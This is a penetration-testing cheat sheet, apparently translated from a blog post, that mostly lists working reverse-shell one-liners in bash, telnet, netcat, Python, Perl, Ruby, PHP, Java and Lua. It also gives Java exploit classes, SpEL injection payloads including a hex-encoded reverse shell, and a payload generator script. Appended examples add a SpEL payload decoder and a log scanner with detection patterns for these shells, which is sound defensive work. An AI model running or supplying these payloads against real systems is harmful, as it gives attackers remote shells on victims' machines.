Penetration testing

0x01. Bash reverse shell

On the attacker's host, start a listener:
nc -lvvp port

On the target host, run one of the following:
bash -i >& /dev/tcp/[host]/Port 0>&1

exec 5<>/dev/tcp/[host]/Port;cat <&5 | while read line; do $line 2>&5 >&5; done

/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/[host]/Port 0>&1

0x02. telnet reverse shell

On the attacker's host, open two terminals and start a listener in each:
nc -lvvp 4444
nc -lvvp 5555

On the target host, run the following (the two listening ports carry input and output respectively; x.x.x.x is the attacker's IP in both places):
telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555

0x03. nc (netcat) reverse shell

Between Windows and Linux
On the attacker's host, start the listener:
nc -lvvp port
On the target host, run:
nc -e /bin/bash x.x.x.x port

Between Windows and Windows (LAN | bridged | public network)
On the attacker's host, run the connecting side:
nc -nv IP [Port]
On the target host, run the listener:
nc -lvp [Port] -e cmd

0x04. Common scripting-language reverse shells

1. Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
2. Perl

Method 1:
perl -e 'use Socket;$i="x.x.x.x";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Method 2:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

3. Ruby

Method 1:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Method 2:
ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",5555).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

4. PHP
php -r '$sock=fsockopen("x.x.x.x",5555);exec("/bin/bash -i <&3 >&3 2>&3");'
 
5. Java
Runtime.getRuntime().exec(new String[]{"cmd", "/c", cmds});      // Windows

Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmds});  // Linux
Runtime.getRuntime().exec("/bin/bash -c 'bash -i >& /dev/tcp/xx.xx.xx.xx/5555 0>&1'");  // Linux


public class exp {
    /**
     * @param args
     * @throws Exception
     */
    public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[] = {"/bin/bash", "-c", "exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/[Host]/Port;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}


Combined with an HTTP service
public class exp {
    // The command is run from the constructor, so exceptions are caught here
    // rather than declared.
    public exp() {
        try {
            Runtime r = Runtime.getRuntime();
            String cmd[] = {"/bin/bash", "-c", "exec 5<>/dev/tcp/xx.xx.xx.xx/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"};
            Process p = r.exec(cmd);
            p.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

ysoserial
String cmd = "java.lang.Runtime.getRuntime().exec(new String []{\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/10.0.0.1/8888;cat <&5 | while read line; do \$line 2>&5 >&5; done\"}).waitFor();";

DNSLog check
public class exp {
    public exp() {
        try {
            java.lang.Runtime.getRuntime().exec("ping xxx.dnslog.cn");
        } catch (java.io.IOException e) {
            e.printStackTrace();
        }
    }
}

wget check
import java.io.IOException;

public class exp {
    public exp() {
        String cmd = "wget http://xx.xx.xx.xx/success";
        try{
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

SpEL expressions

${7*7}
${(new java.lang.ProcessBuilder('calc')).start()} ${new java.lang.ProcessBuilder(new java.lang.String(new byte[]{99,97,108,99})).start()} ${new java.lang.String(new byte[]{86,117,108,110,101,114,97,98,108,101})} //Vulnerable
${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}

${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x70,0x69,0x6E,0x67,0x20,0x77,0x34,0x6B,0x31,0x76,0x73,0x2E,0x64,0x6E,0x73,0x6C,0x6F,0x67,0x2E,0x63,0x6F,0x6D}))} // DNSLog check

${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x62,0x61,0x73,0x68,0x20,0x2d,0x69,0x20,0x3e,0x26,0x20,0x2f,0x64,0x65,0x76,0x2f,0x74,0x63,0x70,0x2f,0x39,0x36,0x2e,0x34,0x35,0x31,0x39,0x31,0x2e,0x32,0x32,0x36,0x2f,0x35,0x35,0x35,0x35,0x20,0x30,0x3e,0x26,0x31}))} // hex-encoded bash reverse shell

T(java.lang.Runtime).getRuntime().exec('calc.exe')
#this.getClass().forName("java.lang.Runtime").getRuntime().exec("calc.exe")

#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")

SpEL reverse-shell generator script (Python 3; under Python 2 input() would evaluate the text instead of returning it)

#!/usr/bin/env python3

message = input('Enter message to encode:')

poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])

for ch in message[1:]:
    poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)

poc += ')}'

print(poc)
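Added example, not from the original post: a small Python decoder that reverses the two string-building encodings used in the SpEL payloads above, the `new byte[]{...}` arrays (decimal or `0x` hex elements) and the `T(java.lang.Character).toString(N).concat(...)` chains that the generator script emits, so that someone reviewing a logged or WAF-captured expression can read the string it would hand to `Runtime.exec` without evaluating it. The sample expressions and the element-masking rule are constructed for this example; the strings they decode to are the probe values the page itself uses.

```python
"""Decode the string-building tricks used in SpEL command-execution payloads.

Added example (not part of the original page). It reverses the two encodings
shown above so a captured expression can be read without evaluating it:
  * new byte[]{...} arrays, with decimal or 0x-hex elements
  * T(java.lang.Character).toString(N) pieces joined with .concat(...)
The sample expressions below are constructed for this demonstration.
"""
import re
from typing import List

BYTE_ARRAY_RE = re.compile(r"new\s+byte\s*\[\s*\]\s*\{([^}]*)\}")
CHAR_PIECE_RE = re.compile(r"T\(java\.lang\.Character\)\.toString\((\d+)\)")
# A chain is one toString(N) piece followed by any number of .concat(piece) calls.
CHAR_CHAIN_RE = re.compile(
    r"T\(java\.lang\.Character\)\.toString\(\d+\)"
    r"(?:\.concat\(T\(java\.lang\.Character\)\.toString\(\d+\)\))*"
)


def _parse_java_int(token: str) -> int:
    """Accept the element forms seen in the payloads: '99' or '0x63' (Java byte literals)."""
    token = token.strip()
    return int(token, 16) if token.lower().startswith("0x") else int(token)


def decode_byte_arrays(expr: str) -> List[str]:
    """Return the string each new byte[]{...} array in expr would construct."""
    decoded = []
    for m in BYTE_ARRAY_RE.finditer(expr):
        values = [_parse_java_int(t) for t in m.group(1).split(",") if t.strip()]
        # Java bytes are signed; mask so e.g. -1 becomes 0xff before decoding.
        decoded.append(bytes(v & 0xFF for v in values).decode("utf-8", errors="replace"))
    return decoded


def decode_char_chains(expr: str) -> List[str]:
    """Return the string each Character.toString(...).concat(...) chain builds."""
    decoded = []
    for m in CHAR_CHAIN_RE.finditer(expr):
        codes = [int(c) for c in CHAR_PIECE_RE.findall(m.group(0))]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def decode_spel(expr: str) -> List[str]:
    """All embedded strings recovered from one expression, byte arrays first."""
    return decode_byte_arrays(expr) + decode_char_chains(expr)


# Constructed samples mirroring the three encodings shown on the page.
SAMPLE_EXPRESSIONS = {
    "decimal_bytes": "${new java.lang.String(new byte[]{86,117,108,110,101,114,97,98,108,101})}",
    "hex_bytes": (
        "${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{"
        "0x70,0x69,0x6e,0x67,0x20,0x78,0x78,0x78,0x2e,0x64,0x6e,0x73,0x6c,0x6f,0x67,0x2e,0x63,0x6e}))}"
    ),
    "char_chain": (
        "${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)"
        ".concat(T(java.lang.Character).toString(97))"
        ".concat(T(java.lang.Character).toString(108))"
        ".concat(T(java.lang.Character).toString(99)))}"
    ),
}

if __name__ == "__main__":
    for label, expr in SAMPLE_EXPRESSIONS.items():
        print(f"{label}: {decode_spel(expr)}")
```

The decoder deliberately never evaluates the expression: it only pattern-matches the two constructors, which is enough to recover the operand of `exec` in every payload on this page. A malformed element such as the `x06B` typo that appears in one of the listed payloads raises `ValueError` from `int()`, which is the right outcome for an analysis tool (the payload as written would not compile either).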

Converter

http://www.jackson-t.ca/runtime-exec-payloads.html

6. Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"
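Added example, not from the original post: a Python scanner that flags the reverse-shell command-line shapes listed in sections 0x01 through 0x04 (the `/dev/tcp` redirection, `nc -e`, the telnet pipe, the socket-plus-`dup2` Python one-liner, the Perl/Ruby/PHP/Lua socket-then-exec forms, and the DNSLog callback) in process-execution logs. The `ts pid= user= cmd=` log format and every log line are constructed for the example, and the patterns are starting points to tune for an environment, not a complete signature set.

```python
"""Flag reverse-shell style command lines in process-execution logs.

Added example (not part of the original page). The indicator patterns are
distilled from the one-liners listed above; the log format and the sample
lines below are constructed for this demonstration.
"""
import re
from typing import Dict, List, NamedTuple


class Indicator(NamedTuple):
    name: str
    pattern: re.Pattern


# One pattern per technique family shown on the page; result order follows list order.
INDICATORS: List[Indicator] = [
    # bash -i >& /dev/tcp/HOST/PORT 0>&1   and   exec 5<>/dev/tcp/HOST/PORT
    Indicator("bash_dev_tcp", re.compile(r"/dev/tcp/\S+/\d+")),
    # nc -e /bin/bash HOST PORT   and   nc -lvp PORT -e cmd
    Indicator("netcat_exec", re.compile(r"\bnc\b.*\s-e\s+\S*(?:sh|cmd)\b")),
    # telnet HOST 4444 | /bin/bash | telnet HOST 5555
    Indicator("telnet_pipe_shell", re.compile(r"\btelnet\b[^|]*\|\s*/bin/(?:ba)?sh\b")),
    # python -c 'import socket,subprocess,os; ... os.dup2(s.fileno(),0) ... subprocess.call(...)'
    Indicator("python_dup2_shell", re.compile(r"socket\.socket.*os\.dup2.*subprocess")),
    # perl -e 'use Socket; ... exec("/bin/sh -i")'
    Indicator("perl_socket_exec", re.compile(r"\bperl\b.*Socket.*\b(?:exec|system)\b")),
    # ruby -rsocket -e '... TCPSocket ... exec / IO.popen ...'
    Indicator("ruby_tcpsocket_exec", re.compile(r"\bruby\b.*TCPSocket.*\b(?:exec|popen)\b")),
    # php -r '$sock=fsockopen(...);exec("/bin/bash -i <&3 >&3 2>&3");'
    Indicator("php_fsockopen_exec", re.compile(r"fsockopen\(.*\bexec\(")),
    # lua -e "... socket.tcp() ... os.execute('/bin/sh -i <&3 >&3 2>&3')"
    Indicator("lua_socket_execute", re.compile(r"socket\.tcp\(\).*os\.execute")),
    # ping xxx.dnslog.cn  (out-of-band DNS callback used as a command-execution check)
    Indicator("dnslog_callback", re.compile(r"\b(?:ping|nslookup|curl|wget)\b.*\bdnslog\.")),
]

# Constructed log format: "<timestamp> pid=<n> user=<name> cmd=<command line>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+pid=(?P<pid>\d+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")


def match_indicators(cmdline: str) -> List[str]:
    """Return the names of every indicator family that matches one command line."""
    return [ind.name for ind in INDICATORS if ind.pattern.search(cmdline)]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Parse constructed log lines and return one hit record per flagged process."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole scan
        names = match_indicators(m["cmd"])
        if names:
            hits.append({"ts": m["ts"], "pid": int(m["pid"]), "user": m["user"], "indicators": names})
    return hits


# Constructed sample lines: five built from the page's one-liners, two benign look-alikes.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z pid=4411 user=www-data cmd=bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "2024-05-01T10:00:02Z pid=4412 user=www-data cmd=nc -e /bin/bash 10.0.0.5 4444",
    "2024-05-01T10:00:03Z pid=4413 user=tomcat cmd=python -c 'import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.5\",5555));"
    "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'",
    "2024-05-01T10:00:04Z pid=4414 user=tomcat cmd=telnet 10.0.0.5 4444 | /bin/bash | telnet 10.0.0.5 5555",
    "2024-05-01T10:00:05Z pid=4415 user=backup cmd=nc -zv db.internal 5432",
    "2024-05-01T10:00:06Z pid=4416 user=deploy cmd=python manage.py runserver",
    "2024-05-01T10:00:07Z pid=4417 user=tomcat cmd=ping -c 1 xxx.dnslog.cn",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} pid={hit['pid']} user={hit['user']} -> {', '.join(hit['indicators'])}")
```

Each indicator corresponds to one family on the page rather than to an exact string, so the `bash_dev_tcp` rule also catches the `exec 5<>/dev/tcp/...` form used in the Java examples and the hex-encoded SpEL variant once it has been decoded. The two benign lines show why the netcat rule keys on `-e` followed by a shell rather than on `nc` alone: a port probe such as `nc -zv` is common and should not page anyone.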

Original source: https://www.cnblogs.com/AtesetEnginner/p/13353481.html